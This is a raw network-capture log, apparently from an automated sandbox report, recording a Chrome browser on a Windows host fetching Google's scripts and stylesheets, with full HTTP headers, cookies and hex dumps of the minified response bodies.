                                                                                                                                                                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                          Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                                                                          Origin: https://ogs.google.com
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ogs.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ogs.google.com
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          48192.168.2.749807142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC2971OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/ck=xjs.hd.8JyeNrzotDo.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAIAoQHcSAACMAgA2ACAAAAAAAAQAAAMAAgQBAEQCAAACBOACACAQAAAFACISAABBE4BHmQCBESBMAAEUQAgQgAQIFEEoRAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAEAAxQACBADoIRAABgJhAgAgBPQABAAAAIAAgAJAAAEaAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/ujg=1/rs=ACT90oEgYxAnltOQ2uX96jprRQET-kPdwg/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sy [TRUNCATED]
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 507580
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 26 Sep 2024 19:25:19 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC572INData Raw: 5f 46 5f 69 6e 73 74 61 6c 6c 43 73 73 28 22 63 2d 77 69 7a 7b 63 6f 6e 74 61 69 6e 3a 73 74 79 6c 65 7d 63 2d 77 69 7a 3e 63 2d 64 61 74 61 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 72 45 54 53 44 7b 63 6f 6e 74 61 69 6e 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 55 62 69 38 5a 7b 63 6f 6e 74 61 69 6e 3a 6c 61 79 6f 75 74 20 73 74 79 6c 65 7d 2e 6a 62 42 49 74 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 44 55 30 4e 4a 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 6c 50 33 4a 6f 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c
                                                                                                                                                                                                                                                                                          Data Ascii: _F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:rel
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 68 2c 71 6c 69 2d 62 6c 75 65 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 49 45 71 69 41 66 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 66 69 6c 6c 2d 75 6e 66 69 6c 6c 2d 72 6f 74 61 74 65 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 2c 71 6c 69 2d 72 65 64 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 73 6d 6f 63 73 65 7b 61 6e 69 6d 61 74
                                                                                                                                                                                                                                                                                          Data Ascii: h,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animat
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 61 63 69 74 79 3a 30 2e 39 39 7d 39 30 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 62 65 44 51 50 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 35 30 25 7d 2e 46 63 58 66 69 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 34 35 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 25 7d 2e 53 50 4b 46 6d 63 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62
                                                                                                                                                                                                                                                                                          Data Ascii: acity:0.99}90%{opacity:0.99}100%{opacity:0}}.beDQP{display:inline-block;height:100%;overflow:hidden;position:relative;width:50%}.FcXfi{box-sizing:border-box;height:100%;left:45%;overflow:hidden;position:absolute;top:0;width:10%}.SPKFmc{border-radius:50%;b
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 20 2e 74 53 33 50 35 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 45 70 46 4e 57 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 6c 65 66 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35
                                                                                                                                                                                                                                                                                          Data Ascii: .tS3P5{border-color:var(--EpFNW);border-bottom-color:transparent}@keyframes qli-left-spin{0%{transform:rotate(130deg)}50%{transform:rotate(-5deg)}100%{transform:rotate(130deg)}}@keyframes qli-right-spin{0%{transform:rotate(-130deg)}50%{transform:rotate(5
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 30 25 7d 2e 5a 65 56 42 74 63 7b 63 6f 6c 6f 72 3a 72 67 62 28 39 35 2c 39 39 2c 31 30 34 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 5c 22 2c 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 61 6c 54 42 51 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 32 2c 32 33 32 2c 32 33 30 29 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 6a 75 73 74 69 66 79
                                                                                                                                                                                                                                                                                          Data Ascii: 0%}.ZeVBtc{color:rgb(95,99,104);font-family:\"Google Sans\",Roboto,Arial,sans-serif;font-size:16px;line-height:25px;max-width:300px}.alTBQe{align-items:center;background-color:rgb(252,232,230);border-top-left-radius:8px;border-top-right-radius:8px;justify
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 30 70 78 7d 2e 50 58 54 36 63 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 34 70 78 7d 2e 63 42 39 4d 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 31 38 2c 32 32 30 2c 32 32 34 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 36 30 2c 36 34 2c 36 37 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 36 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61
                                                                                                                                                                                                                                                                                          Data Ascii: ,sans-serif;font-size:14px;margin-left:20px;margin-right:20px}.PXT6cd{display:flex;margin-top:14px}.cB9M7{background-color:#fff;border:1px solid rgb(218,220,224);color:rgb(60,64,67);border-radius:36px;display:inline-flex;flex-grow:1;font-size:14px;font-fa
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 79 7b 0a 5f 2e 77 28 22 61 61 22 29 3b 0a 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 62 64 22 29 3b 0a 76 61 72 20 6f 67 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 32 31 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 64 25 34 21 3d 33 26 26 28 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 61 5b 64 5d 5e 63 29 2c 63 2b 2b 29 3b 72 65 74 75 72 6e 20 62 7d 2c 70 67 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 2c 63 3b 66 6f 72 28 63 20 69 6e 20 61 29 69 66 28 61 5b 63 5d 2e 65 29 69 66 28 61 5b 63 5d 2e 62 29 62 2b 2b 3b 65 6c 73 65 20 72 65 74 75 72 6e 21
                                                                                                                                                                                                                                                                                          Data Ascii: y{_.w("aa");_.y();}catch(e){_._DumpException(e)}try{_.w("abd");var ogi=function(a){for(var b="",c=21,d=0;d<a.length;d++)d%4!=3&&(b+=String.fromCharCode(a[d]^c),c++);return b},pgi=function(a){var b=0,c;for(c in a)if(a[c].e)if(a[c].b)b++;else return!
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 43 6c 69 65 6e 74 2d 50 63 74 78 22 2c 5f 2e 51 6b 28 62 29 29 3b 62 3d 5f 2e 4c 63 28 22 71 66 49 30 5a 63 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 53 65 61 72 63 68 2d 43 69 2d 46 69 22 2c 5f 2e 51 6b 28 62 29 29 3b 62 3d 5f 2e 4c 63 28 22 41 55 66 37 71 63 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 53 69 6c 6b 2d 43 61 70 61 62 69 6c 69 74 69 65 73 22 2c 5f 2e 51 6b 28 62 29 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 4b 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 22 7d 3b 5f 2e 7a 4b 62 3d 21 31 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f
                                                                                                                                                                                                                                                                                          Data Ascii: );b.Kb()&&a.set("X-Client-Pctx",_.Qk(b));b=_.Lc("qfI0Zc");b.Kb()&&a.set("X-Search-Ci-Fi",_.Qk(b));b=_.Lc("AUf7qc");b.Kb()&&a.set("X-Silk-Capabilities",_.Qk(b));return a};}catch(e){_._DumpException(e)}try{_.yKb=function(){return""};_.zKb=!1;}catch(e){_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 4d 61 70 3a 65 2e 63 6f 6e 74 65 78 74 3b 76 61 72 20 6b 3d 65 2e 7a 66 3d 3d 3d 76 6f 69 64 20 30 3f 6e 65 77 20 4d 61 70 3a 65 2e 7a 66 3b 76 61 72 20 6c 3d 65 2e 61 47 3b 76 61 72 20 70 3d 65 2e 56 6e 62 3b 76 61 72 20 72 3d 65 2e 72 37 3b 76 61 72 20 74 3d 65 2e 68 4a 3b 76 61 72 20 78 3d 65 2e 4c 64 63 3b 65 3d 65 2e 71 24 61 3b 67 3d 67 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 67 3b 68 3d 6e 65 77 20 4d 61 70 28 5b 5d 2e 63 6f 6e 63 61 74 28 5f 2e 6c 64 28 68 29 29 29 3b 68 2e 68 61 73 28 22 5f 66 6d 74 22 29 7c 7c 68 2e 73 65 74 28 22 5f 66 6d 74 22 2c 22 70 72 6f 67 22 29 3b 66 26 26 68 2e 73 65 74 28 22 5f 69 64 22 2c 66 29 3b 28 66 3d 61 2e 66 79 61 29 26 26 68 2e 73 65 74 28 22 5f 78 73 72 66 22 2c 66 29 3b 6b 3d 6e 65 77 20 4d 61 70 28 6b 29 3b
                                                                                                                                                                                                                                                                                          Data Ascii: Map:e.context;var k=e.zf===void 0?new Map:e.zf;var l=e.aG;var p=e.Vnb;var r=e.r7;var t=e.hJ;var x=e.Ldc;e=e.q$a;g=g===void 0?!1:g;h=new Map([].concat(_.ld(h)));h.has("_fmt")||h.set("_fmt","prog");f&&h.set("_id",f);(f=a.fya)&&h.set("_xsrf",f);k=new Map(k);
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 29 26 26 78 2e 73 65 74 28 22 76 65 74 22 2c 64 29 29 3b 66 3f 28 78 2e 73 65 74 28 22 76 65 64 22 2c 66 29 2c 67 6f 6f 67 6c 65 2e 6b 42 4c 26 26 78 2e 73 65 74 28 22 62 6c 22 2c 67 6f 6f 67 6c 65 2e 6b 42 4c 29 2c 67 6f 6f 67 6c 65 2e 73 6e 26 26 78 2e 73 65 74 28 22 73 22 2c 67 6f 6f 67 6c 65 2e 73 6e 29 29 3a 78 2e 73 65 74 28 22 65 69 22 2c 65 7c 7c 28 30 2c 5f 2e 56 6b 2e 76 7a 29 28 29 29 3b 67 26 26 78 2e 73 65 74 28 22 6c 65 69 22 2c 67 29 3b 5f 2e 4a 6a 61 28 78 2c 21 31 2c 21 30 29 3b 67 6f 6f 67 6c 65 2e 75 64 6d 26 26 78 2e 73 65 74 28 22 75 64 6d 22 2c 67 6f 6f 67 6c 65 2e 75 64 6d 29 3b 5f 2e 49 71 62 28 78 29 3b 78 2e 73 65 74 28 22 79 76 22 2c 22 33 22 29 3b 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 7a 2c 42 29 7b 78 2e 73
                                                                                                                                                                                                                                                                                          Data Ascii: )&&x.set("vet",d));f?(x.set("ved",f),google.kBL&&x.set("bl",google.kBL),google.sn&&x.set("s",google.sn)):x.set("ei",e||(0,_.Vk.vz)());g&&x.set("lei",g);_.Jja(x,!1,!0);google.udm&&x.set("udm",google.udm);_.Iqb(x);x.set("yv","3");b.forEach(function(z,B){x.s


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          49192.168.2.749812142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1665OUTGET /xjs/_/ss/k=xjs.hd.8JyeNrzotDo.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAAAoAHYSAACMAAA2ACAAAAAAAAQAAAMAAAAAAEACAAAABMACAAAAAAAEACASAABAEQAAAACBECAAAAEUQAgQgAQIFEEoBAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAAAARQACBADoIRAABgJhAgAgBPQABAAAAIAAAAJAAAAYAANkAAIAAAAAAADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAQAEAAAAAAAAAAAAAAAAAAAAE/d=0/br=1/rs=ACT90oGeXue4vCo29BBNLxd3Hctkci5Jig/m=syjv,syo3?xjs=s4 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Content-Type: text/css; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1689
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 26 Sep 2024 19:25:19 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC581INData Raw: 2e 4d 54 49 61 4b 62 2c 2e 4c 77 44 55 64 63 2c 2e 46 41 6f 45 6c 65 2c 2e 52 6c 54 43 50 64 2c 2e 77 50 4e 66 6a 62 2c 2e 63 61 4e 76 66 64 2c 2e 56 6e 6f 62 34 62 2c 2e 62 62 78 54 42 62 2c 2e 44 70 67 6d 4b 2c 2e 59 4b 55 68 66 62 2c 2e 75 4e 6e 76 62 2c 2e 61 56 73 5a 70 66 2c 2e 52 6f 4f 56 6d 66 2c 2e 64 49 66 76 51 64 2c 2e 56 33 45 7a 6e 2c 2e 45 6e 62 39 70 65 2c 2e 6d 59 75 6f 61 66 2c 2e 6b 4a 53 42 38 2c 2e 74 55 72 34 4b 63 2c 2e 69 51 4d 74 71 65 7b 2d 2d 59 69 34 4e 62 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 70 45 61 30 42 63 3a 76 61 72 28 2d 2d 62 62 51 78 41 62 29 3b 2d 2d 6b 6c 6f 47 33 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 59 61 49 65 4d 62 3a 76 61 72 28 2d 2d 58 4b 4d 44 78 63 29 3b 2d 2d 50 61 38 57 6c 62 3a
